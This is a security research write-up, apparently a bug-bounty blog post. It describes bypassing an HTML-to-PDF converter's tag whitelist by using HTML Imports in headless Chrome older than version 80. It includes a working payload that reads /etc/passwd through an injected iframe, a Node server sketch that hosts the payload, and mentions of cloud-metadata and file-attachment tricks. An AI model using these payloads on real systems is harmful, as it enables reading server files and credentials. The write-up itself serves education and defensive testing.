You’ve probably already heard about many different ways to exploit HTML-to-PDF converters and access sensitive info: you can try to request the 169.254.169.254 IP and read that sweet, sweet metadata. Didn’t work? Inject a <link> with a rel="attachment" attribute and attach a sensitive file to the PDF. No? At least use an <img> to send GET requests to internal hosts or fingerprint them using their favicons?
Recently, I ran into a scenario where all of these HTML tags were correctly filtered, and none of the methods/bypasses/encodings I tried seemed to work.
How the App Worked
The feature I was testing was some kind of contact form. You could customize the look and feel of your form using a rich text editor and when your form gets a response, you can download it as a PDF. After looking at the app a bit more in-depth, I noticed a few things:
- The text editor uses HTML to format text, embed images, etc. But there is a whitelist allowing only a few innocuous HTML tags. <img> is one of the allowed tags, so I used it to send a request to my collaborator server and fingerprint the converter based on the User-Agent header. It was headless Chrome.
- You can attach arbitrary attributes to whitelisted HTML tags as long as they aren’t JS event handlers, i.e. attributes starting with “on”: <img onload> isn’t allowed, but other attributes are accepted.
- One of the allowed HTML tags is <link>, which is used for styling purposes.
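To make those observations concrete, here is a rough model of how the filter appeared to behave from the outside. It is only a sketch: the tag list and the function names are my own assumptions, and the real filter is certainly implemented differently.

```javascript
// Hypothetical model of the observed filter behavior.
// The tag list and all names here are assumptions for illustration only.
const ALLOWED_TAGS = new Set(["b", "i", "p", "img", "link"]);

// An attribute counts as a JS event handler if its name starts with "on".
function isEventHandler(attrName) {
  return attrName.toLowerCase().startsWith("on");
}

// A tag passes if it is whitelisted and none of its attributes is an event handler.
function isAllowed(tag, attrs) {
  if (!ALLOWED_TAGS.has(tag.toLowerCase())) return false;
  return Object.keys(attrs).every((name) => !isEventHandler(name));
}

console.log(isAllowed("img", { src: "http://example.test/x.png" }));     // true
console.log(isAllowed("img", { onload: "alert(1)" }));                   // false
console.log(isAllowed("link", { rel: "import", href: "/import.html" })); // true
console.log(isAllowed("iframe", { src: "file:///etc/passwd" }));         // false
```

The third case is the interesting one: a filter that only looks at tag names and "on" prefixes has no opinion about what rel is set to.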
I set up an HTTP server and used HTTPLeaks to determine if any of the allowed HTML tags could be used to do anything interesting. One of the few vectors that triggered an HTTP request was
<link rel="import" href="https://leaking.via/link-import"/>, aka HTML Imports.
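If you want to reproduce this kind of triage, a small helper on the listening server goes a long way. The sketch below assumes the HTTPLeaks URLs were rewritten to point at your own host, so the request path names the vector (as in link-import above). The function name describeHit and the placeholder base URL are mine, not part of HTTPLeaks.

```javascript
// Sketch: summarize one incoming request from the converter.
// Assumes each test vector uses a distinct path, e.g. /link-import.
function describeHit(req) {
  // req.url is only a path, so a placeholder base is needed to parse it.
  const url = new URL(req.url, "http://placeholder.invalid");
  // Node exposes incoming header names in lowercase.
  const userAgent = req.headers["user-agent"] || "";
  return {
    vector: url.pathname.replace(/^\//, ""),
    userAgent,
    // Headless Chrome identifies itself with a "HeadlessChrome/<version>" token.
    headlessChrome: userAgent.includes("HeadlessChrome"),
  };
}
```

Calling it from a plain Node http request handler and logging the result is enough to see which vectors fire and which client is making the requests.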
HTML Imports 101
HTML Imports were a way to include one HTML document inside another. An import is defined using the following syntax:
<link rel="import" href="/import.html">
It’s important to note that as of 2021, the HTML imports feature has been deprecated and removed from Chrome, so this technique only works on Chrome versions before 80.
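Since the version matters, it's worth checking the User-Agent you captured before spending time on this. Here is a minimal sketch that pulls the major version out of a Chrome User-Agent string and compares it with the cutoff of 80 mentioned above. The function names are hypothetical, and a User-Agent can be spoofed, so treat the result as a hint only.

```javascript
// Sketch: guess from a User-Agent string whether HTML Imports may still work.
// Function names are hypothetical; the cutoff of 80 comes from the text above.
function chromeMajorVersion(userAgent) {
  // Matches both "Chrome/79.0..." and "HeadlessChrome/79.0...".
  const match = /(?:Headless)?Chrome\/(\d+)\./.exec(userAgent);
  return match ? Number(match[1]) : null;
}

function mayStillSupportHtmlImports(userAgent) {
  const major = chromeMajorVersion(userAgent);
  return major !== null && major < 80;
}

const oldUa =
  "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/79.0.3945.0 Safari/537.36";
const newUa =
  "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36";

console.log(mayStillSupportHtmlImports(oldUa)); // true
console.log(mayStillSupportHtmlImports(newUa)); // false
```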
You’ve probably guessed where this is going. The most straightforward way to exploit an HTML-to-PDF converter is using an <iframe>, and if it’s filtered, we can use an HTML import to create one.
The payload looked like this:
<link rel="import" href="http://[my_server]/import.html">
And on my server, I enabled CORS and hosted a payload that created an <iframe> with the content of /etc/passwd:
<script>
  var iframe = document.createElement('iframe');
  iframe.height = 1000;
  iframe.width = 1000;
  iframe.src = "file:///etc/passwd";
  document.body.appendChild(iframe);
</script>
document here references the main document that’s importing the file. To access the import document itself, you can use document.currentScript.ownerDocument.
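For reference, the server side can be sketched in a few lines of Node. This is not the exact setup I used, just one way to do it: cross-origin imports are subject to CORS, so the response needs an Access-Control-Allow-Origin header. The names handleImport and createImportServer and the port in the usage note are placeholders.

```javascript
// Sketch of a server that hosts the import payload with CORS enabled.
// Names are placeholders; this serves the same body for every path.
const http = require("node:http");

// The imported document: a script that appends an <iframe> to the importing page.
const IMPORT_BODY = [
  "<script>",
  "  var iframe = document.createElement('iframe');",
  "  iframe.height = 1000;",
  "  iframe.width = 1000;",
  "  iframe.src = 'file:///etc/passwd';",
  "  document.body.appendChild(iframe);",
  "</script>",
].join("\n");

// Answer every request with the payload and a permissive CORS header.
function handleImport(req, res) {
  res.writeHead(200, {
    "Content-Type": "text/html",
    "Access-Control-Allow-Origin": "*",
  });
  res.end(IMPORT_BODY);
}

// Returns the server without starting it; the caller decides where to listen.
function createImportServer() {
  return http.createServer(handleImport);
}
```

To run it, call createImportServer().listen(8000), or whatever port suits you, and point the href of the import at that host.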
To test this locally, you can install a Chrome version older than 80 and use this command to generate a PDF:
google-chrome-stable --headless --print-to-pdf import.html
It’s useful to read RFCs and research the technologies that you’re trying to break. Usually, you will find interesting behavior that may help you find more exploits and bypasses. Although the HTML Imports feature has been deprecated in newer versions of Chrome, it might come in handy; the older versions are still used in the wild.